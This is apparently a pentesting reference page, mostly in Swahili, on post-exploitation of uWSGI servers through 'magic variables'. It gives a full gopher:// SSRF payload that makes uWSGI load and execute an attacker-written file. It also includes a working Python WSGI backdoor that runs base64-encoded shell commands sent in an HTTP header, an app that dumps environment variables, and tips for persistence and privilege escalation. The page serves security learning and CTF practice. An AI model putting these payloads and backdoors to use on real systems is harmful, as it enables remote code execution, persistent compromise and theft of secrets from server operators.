WSGI Post-Exploitation Tricks

Reading time: 5 minutes

Muhtasari wa WSGI

Web Server Gateway Interface (WSGI) ni spesifikesheni inayoelezea jinsi web server inavyowasiliana na web applications, na jinsi web applications zinaweza kuunganishwa pamoja ili kuchakata request moja. uWSGI ni mojawapo ya servers maarufu za WSGI, mara nyingi ikitumika kuhudumia Python web applications.

uWSGI Magic Variables Exploitation

uWSGI hutoa vigezo maalum vinavyoitwa "magic variables" vinavyoweza kutumika kusanidi mienendo ya server kwa njia ya dynamic. Vigezo hivi vinaweza kuwekwa kupitia HTTP headers na vinaweza kusababisha udhaifu mkubwa wa usalama ikiwa havitathminiwa ipasavyo.

Key Exploitable Variables

UWSGI_FILE - Utekelezaji wa faili yoyote

uwsgi_param UWSGI_FILE /path/to/python/file.py;

Kigezo hiki kinaruhusu kupakia na kutekeleza faili zozote za Python kama maombi ya WSGI. Iwapo mshambulizi anaweza kudhibiti kigezo hiki, anaweza kufanikisha Remote Code Execution (RCE).

UWSGI_SCRIPT - Kupakia skripti

uwsgi_param UWSGI_SCRIPT module.path:callable;
uwsgi_param SCRIPT_NAME /endpoint;

Inapakia script iliyobainishwa kama programu mpya. Ikiunganishwa na file upload au write capabilities, hii inaweza kusababisha RCE.

UWSGI_MODULE and UWSGI_CALLABLE - Dynamic Module Loading

uwsgi_param UWSGI_MODULE malicious.module;
uwsgi_param UWSGI_CALLABLE evil_function;
uwsgi_param SCRIPT_NAME /backdoor;

Vigezo hivi vinaruhusu kupakia modules za Python zozote na kuita functions maalum ndani yao.

UWSGI_SETENV - Udhibiti wa vigezo vya mazingira

uwsgi_param UWSGI_SETENV DJANGO_SETTINGS_MODULE=malicious.settings;

Inaweza kutumika kubadilisha environment variables, na hivyo kuathiri application behavior au kupakia malicious configuration.

UWSGI_PYHOME - Python Environment Manipulation

uwsgi_param UWSGI_PYHOME /path/to/malicious/venv;

Hubadilisha mazingira ya virtual ya Python, na hivyo inaweza kupakia vifurushi hatarishi au mfasiri tofauti wa Python.

UWSGI_CHDIR - Directory Traversal

uwsgi_param UWSGI_CHDIR /etc/;

Inabadilisha saraka ya kazi kabla ya kuchakata maombi, jambo ambalo linaweza kutumika kwa mashambulizi ya path traversal.

SSRF + Gopher kwa

Njia ya Mashambulizi

Wakati uWSGI inapatikana kupitia SSRF (Server-Side Request Forgery), wadukuzi wanaweza kuingiliana na socket ya ndani ya uWSGI ili kutumia vigezo maalum (magic variables). Hii ni hatari hasa wakati:

1. Programu ina mianya ya SSRF
2. uWSGI inaendesha kwenye port/socket ya ndani
3. Programu haina kuthibitisha vizuri vigezo maalum (magic variables)

uWSGI inapatikana kutokana na SSRF kwa sababu faili ya config uwsgi.ini ina: socket = 127.0.0.1:5000, ikifanya ipatikane kutoka kwa web application kupitia SSRF.

Mfano wa Utekelezaji

Hatua 1: Tengeneza Payload Hasidi

Kwanza, weka (inject) code ya Python ndani ya faili inayoweza kufikiwa na seva (kuandika faili ndani ya seva, extension ya faili haina umuhimu):

# Payload injected into a JSON profile file
import os
os.system("/readflag > /app/profiles/result.json")

Hatua 2: Tengeneza uWSGI Protocol Request

Tumia Gopher protocol kutuma raw uWSGI packets:

gopher://127.0.0.1:5000/_%00%D2%00%00%0F%00SERVER_PROTOCOL%08%00HTTP/1.1%0E%00REQUEST_METHOD%03%00GET%09%00PATH_INFO%01%00/%0B%00REQUEST_URI%01%00/%0C%00QUERY_STRING%00%00%0B%00SERVER_NAME%00%00%09%00HTTP_HOST%0E%00127.0.0.1%3A5000%0A%00UWSGI_FILE%1D%00/app/profiles/malicious.json%0B%00SCRIPT_NAME%10%00/malicious.json

Payload hii:

• Inaunganisha na uWSGI kwenye port 5000
• Inaweka UWSGI_FILE ili kuelekeza kwa faili yenye madhara
• Inalazimisha uWSGI kupakia na kutekeleza msimbo wa Python

uWSGI Protocol Structure

Protocol ya uWSGI inatumia muundo wa binary ambapo:

• Variables zimeandikwa kwa format inayoweka urefu kabla ya string
• Kila variable ina: [name_length][name][value_length][value]
• Paketi huanza na header inayojumuisha jumla ya ukubwa

Post-Exploitation Techniques

1. Persistent Backdoors

File-based Backdoor

# backdoor.py
import subprocess
import base64

def application(environ, start_response):
cmd = environ.get('HTTP_X_CMD', '')
if cmd:
result = subprocess.run(base64.b64decode(cmd), shell=True, capture_output=True, text=True)
response = f"STDOUT: {result.stdout}\nSTDERR: {result.stderr}"
else:
response = "Backdoor active"

start_response('200 OK', [('Content-Type', 'text/plain')])
return [response.encode()]

Kisha tumia UWSGI_FILE ili kupakia backdoor hii:

uwsgi_param UWSGI_FILE /tmp/backdoor.py;
uwsgi_param SCRIPT_NAME /admin;

Udumu Kulingana na Mazingira

uwsgi_param UWSGI_SETENV PYTHONPATH=/tmp/malicious:/usr/lib/python3.8/site-packages;

2. Ufichaji wa Taarifa

Environment Variable Dumping

# env_dump.py
import os
import json

def application(environ, start_response):
env_data = {
'os_environ': dict(os.environ),
'wsgi_environ': dict(environ)
}

start_response('200 OK', [('Content-Type', 'application/json')])
return [json.dumps(env_data, indent=2).encode()]

Ufikiaji wa Mfumo wa Faili

Tumia UWSGI_CHDIR pamoja na file serving ili kufikia faili nyeti:

uwsgi_param UWSGI_CHDIR /etc/;
uwsgi_param UWSGI_FILE /app/file_server.py;

3. Privilege Escalation

Socket Manipulation

Ikiwa uWSGI inaendesha kwa ruhusa zilizoinuliwa, washambuliaji wanaweza kubadilisha ruhusa za soketi:

uwsgi_param UWSGI_CHDIR /tmp;
uwsgi_param UWSGI_SETENV UWSGI_SOCKET_OWNER=www-data;

Kufunika Mipangilio

# malicious_config.py
import os

# Override uWSGI configuration
os.environ['UWSGI_MASTER'] = '1'
os.environ['UWSGI_PROCESSES'] = '1'
os.environ['UWSGI_CHEAPER'] = '1'

Marejeo

• uWSGI Magic Variables Documentation
• IOI SaveData CTF Writeup
• uWSGI Security Best Practices